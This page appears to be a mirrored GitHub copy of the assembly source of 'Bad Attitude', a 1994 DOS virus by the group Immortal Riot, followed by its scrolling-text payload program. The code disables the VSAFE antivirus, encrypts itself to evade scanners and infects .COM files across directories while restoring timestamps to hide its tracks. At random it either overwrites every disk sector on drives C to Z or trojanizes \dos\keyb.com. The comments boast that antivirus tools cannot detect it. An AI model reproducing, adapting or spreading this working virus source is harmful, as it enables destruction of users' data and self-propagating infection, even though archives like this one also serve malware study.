mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 22:45:27 +00:00
412 lines
8.3 KiB
NASM
412 lines
8.3 KiB
NASM
|
; -Bad Attitude-
|
|||
|
; "Created by Immortal Riot's destructive development team"
|
|||
|
; (c) '94 The Unforgiven/Immortal Riot
|
|||
|
;
|
|||
|
; "If I don't have bad attitude, this virus is harmless"
|
|||
|
;
|
|||
|
; Notes:
|
|||
|
; F-Prot, Scan, Tbav, Findviru can't find shits of this virus.
|
|||
|
;
|
|||
|
; Disclaimer:
|
|||
|
; If this virus damages you, it's a pleasure, but not the fault
|
|||
|
; of the author. If you want to sue me, it's your loss.
|
|||
|
;
|
|||
|
; Dedication:
|
|||
|
; I dedicate this virus to all virus writers worldwide!
|
|||
|
|
|||
|
.MODEL TINY
|
|||
|
.CODE
|
|||
|
ORG 100h
|
|||
|
|
|||
|
Virus_start:
|
|||
|
xchg ax,ax
|
|||
|
xchg ax,ax ; Take down VSAFE from memory!
|
|||
|
mov ax,0fa01h
|
|||
|
mov dx,5945h
|
|||
|
int 16h
|
|||
|
|
|||
|
call get_delta_offset
|
|||
|
real_start:
|
|||
|
|
|||
|
Get_delta_offset: ; Get delta offset
|
|||
|
pop bp
|
|||
|
sub bp, offset get_delta_offset
|
|||
|
|
|||
|
Call_en_de_crypt:
|
|||
|
mov ax,bp
|
|||
|
add ax,11Ah
|
|||
|
push ax
|
|||
|
jmp short en_de_crypt ; First, decrypt the virus
|
|||
|
jmp short real_code_start ; and then, continue!
|
|||
|
|
|||
|
encryption_value dw 0 ; Random value for each infection!
|
|||
|
|
|||
|
Write_virus:
|
|||
|
call en_de_crypt ; Encrypt the virus
|
|||
|
mov ah,40h
|
|||
|
mov cx, offset virus_end-100h
|
|||
|
lea dx, [bp+100h]
|
|||
|
int 21h
|
|||
|
call en_de_crypt ; Decrypt the virus again
|
|||
|
ret
|
|||
|
|
|||
|
En_de_crypt:
|
|||
|
mov ax,word ptr [bp+encryption_value]
|
|||
|
lea si,[bp+real_code_start]
|
|||
|
mov cx,(virus_end-real_code_start+1)/2
|
|||
|
|
|||
|
Xor_LoopY:
|
|||
|
xor word ptr [si],ax
|
|||
|
inc si
|
|||
|
inc si
|
|||
|
Loop Xor_LoopY
|
|||
|
ret
|
|||
|
|
|||
|
Real_code_start:
|
|||
|
mov ah,2ch ; Get Time
|
|||
|
int 21h
|
|||
|
cmp dl,0 ; 1%
|
|||
|
jne Another_Percent
|
|||
|
call Create_file
|
|||
|
|
|||
|
Another_Percent:
|
|||
|
cmp dl,1 ; another %
|
|||
|
jne not_this_time ; Naaaaaaah
|
|||
|
|
|||
|
mov ah,09h ; Print the virus name
|
|||
|
lea dx,[bp+virus]
|
|||
|
int 21h
|
|||
|
|
|||
|
Trash_sucker: ; Overwrite all sectors on all drives!
|
|||
|
mov al,2h ; on drive C - Z
|
|||
|
Drive:
|
|||
|
mov cx,1
|
|||
|
lea bx,virus
|
|||
|
cwd
|
|||
|
Next_Sector:
|
|||
|
int 26h
|
|||
|
inc dx
|
|||
|
jnc next_sector
|
|||
|
inc al
|
|||
|
jmp short drive
|
|||
|
|
|||
|
Not_this_time:
|
|||
|
cld
|
|||
|
Set_Dta: ; Set the dta
|
|||
|
mov ah,1ah
|
|||
|
lea dx,[bp+virus_end]
|
|||
|
int 21h
|
|||
|
|
|||
|
Buffer_Xfer: ; Restore the beginning
|
|||
|
lea si,[bp+first_bytes]
|
|||
|
lea di,[bp+@buf]
|
|||
|
mov cx,2
|
|||
|
rep movsw
|
|||
|
|
|||
|
mov di,3 ; Infection-counter
|
|||
|
|
|||
|
Get_drive: ; Get drive from where we're
|
|||
|
mov ah,19h ; executed from
|
|||
|
int 21h
|
|||
|
|
|||
|
cmp al,2
|
|||
|
jae Get_Dir ; A: or B:, if so, don't infect
|
|||
|
jmp restore_start ; other programs! Just return normally!
|
|||
|
|
|||
|
Get_dir: ; Get directory from we're executed
|
|||
|
mov ah,47h ; from!
|
|||
|
xor dl,dl
|
|||
|
lea si,[bp+dirbuf+1]
|
|||
|
int 21h
|
|||
|
|
|||
|
Find_First: ; Find first file
|
|||
|
mov cx,111b
|
|||
|
lea dx,[bp+filemask]
|
|||
|
mov ah,4eh
|
|||
|
_4fh: ; When called ah=4fh
|
|||
|
int 21h
|
|||
|
|
|||
|
jnc clear_file_attribs ; We did find a file!
|
|||
|
|
|||
|
chdir: ; We didn't find a file,
|
|||
|
cmp byte ptr [bp+DOSflag],1
|
|||
|
jne dot_dott
|
|||
|
jmp no_more_files
|
|||
|
|
|||
|
dot_dott:
|
|||
|
mov ah,3bh ; so we try in another dir!
|
|||
|
lea dx,[bp+offset dot_dot]
|
|||
|
int 21h
|
|||
|
jnc find_first
|
|||
|
|
|||
|
mov ah,3bh ; We try to infect files in
|
|||
|
lea dx,[bp+offset DOS] ; \DOS
|
|||
|
int 21h
|
|||
|
inc byte ptr [bp+dosflag]
|
|||
|
|
|||
|
jnc find_first
|
|||
|
jmp no_more_files
|
|||
|
|
|||
|
Clear_file_attribs: ; Clear file attribs
|
|||
|
mov ax,4301h
|
|||
|
sub cx,cx
|
|||
|
lea dx,[bp+virus_end+1eh]
|
|||
|
int 21h
|
|||
|
|
|||
|
Open_file: ; Open the file in read/write mode!
|
|||
|
mov ax,3d02h
|
|||
|
int 21h
|
|||
|
xchg ax,bx
|
|||
|
|
|||
|
Read_file: ; Red the first four bytes of the file
|
|||
|
mov ah,3fh
|
|||
|
mov cx,4
|
|||
|
lea dx,[bp+first_bytes]
|
|||
|
int 21h
|
|||
|
|
|||
|
Check_already_infected: ; and check if it's already infected
|
|||
|
|
|||
|
mov si,dx
|
|||
|
lea si,[bp+first_bytes]
|
|||
|
cmp word ptr [si],0e990h
|
|||
|
je already_infected
|
|||
|
|
|||
|
cmp word ptr [si],5a4dh ; or an EXE file?
|
|||
|
je already_infected
|
|||
|
cmp word ptr [si],4d5ah ; or an EXE file?
|
|||
|
je already_infected
|
|||
|
|
|||
|
mov ax,word ptr [bp+virus_end+1ah] ; or smaller than 400 bytes?
|
|||
|
cmp ax,400
|
|||
|
jb already_infected
|
|||
|
cmp ax,64000 ; or bigger than 64000 bytes?
|
|||
|
ja already_infected ; if so, don't infect <20>m!
|
|||
|
|
|||
|
Move_file_pointer_2_EOF:
|
|||
|
|
|||
|
call F_Ptr ; Move file-pointer to end of file
|
|||
|
sub ax,4 ; take the last four bytes
|
|||
|
|
|||
|
Fill_1st_buf:
|
|||
|
mov word ptr [bp+Istbuf],0e990h ; Fill the four bytes
|
|||
|
mov word ptr [bp+Istbuf+2],ax ; with our own jmp-constrution!
|
|||
|
|
|||
|
_TopOfFile: ; Move file-pointer to
|
|||
|
mov ax,4200h ; the beginning of file!
|
|||
|
int 21h
|
|||
|
|
|||
|
Write_first4: ; Write our own jump instruction
|
|||
|
mov ah,40h
|
|||
|
mov cx,4
|
|||
|
lea dx,[bp+Istbuf]
|
|||
|
int 21h
|
|||
|
|
|||
|
_EOF: ; Move to end of file again
|
|||
|
call F_Ptr
|
|||
|
|
|||
|
Get_random: ; Get a random value
|
|||
|
mov ah,2ch
|
|||
|
int 21h
|
|||
|
add dl, dh
|
|||
|
|
|||
|
jz get_random
|
|||
|
mov word ptr [bp+encryption_value],dx ; put it as the encryption value
|
|||
|
call write_virus ; infect the file
|
|||
|
|
|||
|
jmp short restore_time_date ; Then cover our tracks!
|
|||
|
|
|||
|
Already_infected:
|
|||
|
inc di
|
|||
|
|
|||
|
Restore_Time_Date: ; Restore the infected file time
|
|||
|
lea si,[bp+virus_end+16h] ; and date stamps
|
|||
|
mov cx,word ptr [si]
|
|||
|
mov dx,word ptr [si+2]
|
|||
|
mov ax,5701h
|
|||
|
int 21h
|
|||
|
|
|||
|
Close_file: ; Close the file!
|
|||
|
mov ah,3eh
|
|||
|
int 21h
|
|||
|
|
|||
|
Set_old_attrib: ; Set back old attribs!
|
|||
|
mov ax,4301h
|
|||
|
xor ch,ch
|
|||
|
mov cl,byte ptr [bp+virus_end+15h]
|
|||
|
lea dx,[bp+virus_end+1eh]
|
|||
|
int 21h
|
|||
|
|
|||
|
Enough_files: ; Have we infected
|
|||
|
dec di ; 3 files this run?
|
|||
|
cmp di,0
|
|||
|
je no_more_files
|
|||
|
|
|||
|
mov ah,4fh ; No, then, search for the next file!
|
|||
|
jmp _4fh
|
|||
|
|
|||
|
No_more_files: ; We've infected enough!
|
|||
|
Restore_start:
|
|||
|
lea si,[bp+@buf]
|
|||
|
mov di,100h
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
|
|||
|
Restore_dir: ; Restore the directory to
|
|||
|
lea dx,[bp+dirbuf] ; from where we were
|
|||
|
mov ah,3bh ; executed from!
|
|||
|
int 21h
|
|||
|
|
|||
|
Exit_proc: ; and then return to the
|
|||
|
mov bx,100h ; real-file!
|
|||
|
push bx
|
|||
|
xor ax,ax
|
|||
|
retn
|
|||
|
|
|||
|
F_Ptr: ; Move the file-pointer to end of
|
|||
|
mov ax,4202h ; file! (used twice!)
|
|||
|
xor cx, cx
|
|||
|
xor dx, dx
|
|||
|
int 21h
|
|||
|
ret
|
|||
|
|
|||
|
Create_file: ; Create a new \dos\keyb.com
|
|||
|
Mov ah,3ch
|
|||
|
mov cx,0
|
|||
|
lea dx,[bp+filename]
|
|||
|
int 21h
|
|||
|
|
|||
|
Write_Da_File:
|
|||
|
xchg ax,bx
|
|||
|
mov ah,64d
|
|||
|
mov cx,len
|
|||
|
lea dx,[bp+scroll] ; Write new content in the file
|
|||
|
int 21h
|
|||
|
|
|||
|
Close_Da_File: ; Close the trojanized file
|
|||
|
mov ah,3eh
|
|||
|
int 21h
|
|||
|
ret ; and continue..
|
|||
|
|
|||
|
scroll db "<22><>$<0F><03>R<><52>2Ҵ<02><10>O<00><00>",1ah," <09>"
|
|||
|
scrol1 db " <20>Q<>8",0ffh,"<22><>Y<EFBFBD><02>z<01>!<21>{<01>!<21>|<01>!<21>}<01>!<21>~<01>!<21><01>!<21><16><01>!<21><16><01>!<21> <20>!<21><16><01>!<21><16><01>!<21><16><01>!<21><16><01>!<21> <20>!O<><4F>ImmortalRiot "
|
|||
|
len equ $-scroll
|
|||
|
|
|||
|
virus db '[BAD ATTITUDE!]$'
|
|||
|
copy db "(c) '94 The Unforgiven/Immortal Riot"
|
|||
|
|
|||
|
Filemask db '*.COM',0
|
|||
|
Dot_dot db '..',0
|
|||
|
dos db '\dos',0
|
|||
|
|
|||
|
filename db '\dos\keyb.com',0
|
|||
|
Buffers:
|
|||
|
First_bytes db 90h,90h,50h,0c3h ; Our own little jmp constrution!
|
|||
|
|
|||
|
|
|||
|
@buf db 4 dup(0) ; Empty space to be
|
|||
|
Istbuf db 4 dup(0) ; filled with instructions
|
|||
|
DIRBUF db "\"
|
|||
|
Junkie:
|
|||
|
db 64 DUP(0)
|
|||
|
dosflag db 0
|
|||
|
virus_end:
|
|||
|
end virus_start
|
|||
|
; ------------------------------------------------------------------------------
|
|||
|
; Here is the nice pay-load (read:scroll) in the Bad Attitude virus.
|
|||
|
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
org 100h
|
|||
|
Ssscroll:
|
|||
|
mov al,dl
|
|||
|
and al,15
|
|||
|
|
|||
|
mov ah,3
|
|||
|
int 10h
|
|||
|
push dx
|
|||
|
|
|||
|
mov dh,al
|
|||
|
xor dl,dl
|
|||
|
|
|||
|
mov ah,2
|
|||
|
int 10h
|
|||
|
|
|||
|
mov di,79
|
|||
|
mov cx,1
|
|||
|
|
|||
|
arrow:
|
|||
|
mov ax,91Ah
|
|||
|
|
|||
|
mov bl,10
|
|||
|
int 10h
|
|||
|
|
|||
|
DELAY:
|
|||
|
push cx
|
|||
|
mov cx,-200
|
|||
|
rep lodsb
|
|||
|
pop cx
|
|||
|
|
|||
|
mov ah,2
|
|||
|
|
|||
|
mov dl, I
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, M
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, M2
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, O
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, R
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, T
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, A
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, L
|
|||
|
int 21h
|
|||
|
|
|||
|
Space:
|
|||
|
mov dl, ' '
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, R2
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, I2
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, O2
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl, T2
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dl,' '
|
|||
|
int 21h
|
|||
|
dec di
|
|||
|
jmp arrow ; Loop until a ctrl+break is pressed!
|
|||
|
|
|||
|
heap:
|
|||
|
I db 'I' ; Immortal Riot
|
|||
|
M db 'm'
|
|||
|
M2 db 'm'
|
|||
|
o db 'o'
|
|||
|
R db 'r'
|
|||
|
T db 't'
|
|||
|
A db 'a'
|
|||
|
L db 'l'
|
|||
|
|
|||
|
R2 db 'R'
|
|||
|
I2 db 'i'
|
|||
|
O2 DB 'o'
|
|||
|
T2 DB 't' ; Is here to stay!
|
|||
|
a13 db ' '
|
|||
|
|
|||
|
end Ssscroll
|